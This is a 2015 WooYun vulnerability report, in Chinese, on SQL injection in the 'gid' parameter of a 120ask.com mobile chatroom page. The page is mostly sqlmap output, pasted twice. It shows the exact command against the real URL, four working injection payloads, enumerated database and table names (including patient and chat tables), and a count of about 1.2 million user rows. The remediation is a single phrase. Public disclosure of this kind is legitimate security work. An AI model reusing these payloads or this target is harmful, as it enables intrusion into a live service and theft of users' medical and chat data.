当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116413

漏洞标题:有问必答网注入漏洞一枚可脱裤

相关厂商:有问必答网

漏洞作者: 路人甲

提交时间:2015-05-27 10:17

修复时间:2015-07-11 10:18

公开时间:2015-07-11 10:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

注入点:
sqlmap.py -u "http://m.120ask.com/kuaiwen/tongbingxianglian/chatroom?gid=10055&sex=2" -p "gid" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: gid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=10055') AND 2323=2323 AND ('ecNe'='ecNe&sex=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: gid=10055') AND (SELECT 1523 FROM(SELECT COUNT(*),CONCAT(0x716b626b
71,(SELECT (ELT(1523=1523,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('rSTg'='rSTg&sex=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gid=10055') AND (SELECT * FROM (SELECT(SLEEP(5)))vfwl) AND ('zdCv'=
'zdCv&sex=2
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: gid=-1844') UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x51796b74476
f425a716e,0x7178767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL-- &sex=2
---
[00:42:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[00:42:02] [INFO] fetching database names
[00:42:02] [INFO] the SQL query used returns 3 entries
[00:42:02] [INFO] resumed: information_schema
[00:42:02] [INFO] resumed: bingyou
[00:42:02] [INFO] resumed: test
available databases [3]:
[*] bingyou
[*] information_schema
[*] test
表Database: bingyou
[71 tables]
+--------------------------+
| __tj_temp |
| apply_hongbao |
| bingyou_chat |
| chat_day_show_tongji |
| chat_day_tongji |
| chat_log |
| check_filter |
| check_relation |
| check_url |
| gift_pay_log |
| gift_product |
| gift_trade |
| group_level |
| invitation |
| jz_patient |
| jz_salary_log |
| jz_salary_operate |
| jz_salary_out |
| klyq_article |
| klyq_todo |
| klyq_tongji |
| klyq_user |
| kw_tbxl_tongji |
| red_group_giving_log |
| red_packet |
| red_packet_sample |
| red_packet_split |
| red_packet_split_log |
| red_packet_trade |
| red_packet_use |
| sta_jz_chat |
| sta_jz_group |
| sta_jz_reply |
| sta_jz_salary |
| sta_jz_topic |
| sta_percent |
| tongji_daily_focus |
| tousu |
| wx_blacklist |
| wx_tbxl_active_log |
| wx_tbxl_apply_join_group |
| wx_tbxl_chat |
| wx_tbxl_chatroom_msg |
| wx_tbxl_chatroom_user |
| wx_tbxl_group_base |
| wx_tbxl_group_news_con |
| wx_tbxl_group_news_con_0 |
| wx_tbxl_group_news_con_1 |
| wx_tbxl_group_news_con_2 |
| wx_tbxl_group_news_con_3 |
| wx_tbxl_group_news_con_4 |
| wx_tbxl_group_news_con_5 |
| wx_tbxl_group_news_con_6 |
| wx_tbxl_group_news_con_7 |
| wx_tbxl_group_news_con_8 |
| wx_tbxl_group_news_con_9 |
| wx_tbxl_group_user |
| wx_tbxl_msg |
| wx_tbxl_msg_user |
| wx_tbxl_msg_user_0 |
| wx_tbxl_msg_user_1 |
| wx_tbxl_msg_user_2 |
| wx_tbxl_msg_user_3 |
| wx_tbxl_msg_user_4 |
| wx_tbxl_msg_user_5 |
| wx_tbxl_msg_user_6 |
| wx_tbxl_msg_user_7 |
| wx_tbxl_msg_user_8 |
| wx_tbxl_msg_user_9 |
| wx_tbxl_patient |
| wx_tbxl_voice |
+--------------------------+
数量;
select count(1) from wx_tbxl_chatroom_user: '1220314'
[00:54:02] [INFO] fetched data logged to text files
百万级别数量。

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: gid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=10055') AND 2323=2323 AND ('ecNe'='ecNe&sex=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: gid=10055') AND (SELECT 1523 FROM(SELECT COUNT(*),CONCAT(0x716b626b
71,(SELECT (ELT(1523=1523,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('rSTg'='rSTg&sex=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gid=10055') AND (SELECT * FROM (SELECT(SLEEP(5)))vfwl) AND ('zdCv'=
'zdCv&sex=2
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: gid=-1844') UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x51796b74476
f425a716e,0x7178767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL-- &sex=2
---
[00:42:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[00:42:02] [INFO] fetching database names
[00:42:02] [INFO] the SQL query used returns 3 entries
[00:42:02] [INFO] resumed: information_schema
[00:42:02] [INFO] resumed: bingyou
[00:42:02] [INFO] resumed: test
available databases [3]:
[*] bingyou
[*] information_schema
[*] test
表Database: bingyou
[71 tables]
+--------------------------+
| __tj_temp |
| apply_hongbao |
| bingyou_chat |
| chat_day_show_tongji |
| chat_day_tongji |
| chat_log |
| check_filter |
| check_relation |
| check_url |
| gift_pay_log |
| gift_product |
| gift_trade |
| group_level |
| invitation |
| jz_patient |
| jz_salary_log |
| jz_salary_operate |
| jz_salary_out |
| klyq_article |
| klyq_todo |
| klyq_tongji |
| klyq_user |
| kw_tbxl_tongji |
| red_group_giving_log |
| red_packet |
| red_packet_sample |
| red_packet_split |
| red_packet_split_log |
| red_packet_trade |
| red_packet_use |
| sta_jz_chat |
| sta_jz_group |
| sta_jz_reply |
| sta_jz_salary |
| sta_jz_topic |
| sta_percent |
| tongji_daily_focus |
| tousu |
| wx_blacklist |
| wx_tbxl_active_log |
| wx_tbxl_apply_join_group |
| wx_tbxl_chat |
| wx_tbxl_chatroom_msg |
| wx_tbxl_chatroom_user |
| wx_tbxl_group_base |
| wx_tbxl_group_news_con |
| wx_tbxl_group_news_con_0 |
| wx_tbxl_group_news_con_1 |
| wx_tbxl_group_news_con_2 |
| wx_tbxl_group_news_con_3 |
| wx_tbxl_group_news_con_4 |
| wx_tbxl_group_news_con_5 |
| wx_tbxl_group_news_con_6 |
| wx_tbxl_group_news_con_7 |
| wx_tbxl_group_news_con_8 |
| wx_tbxl_group_news_con_9 |
| wx_tbxl_group_user |
| wx_tbxl_msg |
| wx_tbxl_msg_user |
| wx_tbxl_msg_user_0 |
| wx_tbxl_msg_user_1 |
| wx_tbxl_msg_user_2 |
| wx_tbxl_msg_user_3 |
| wx_tbxl_msg_user_4 |
| wx_tbxl_msg_user_5 |
| wx_tbxl_msg_user_6 |
| wx_tbxl_msg_user_7 |
| wx_tbxl_msg_user_8 |
| wx_tbxl_msg_user_9 |
| wx_tbxl_patient |
| wx_tbxl_voice |
+--------------------------+
数量;
select count(1) from wx_tbxl_chatroom_user: '1220314'
[00:54:02] [INFO] fetched data logged to text files
百万级别数量。

修复方案:

过滤参数

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝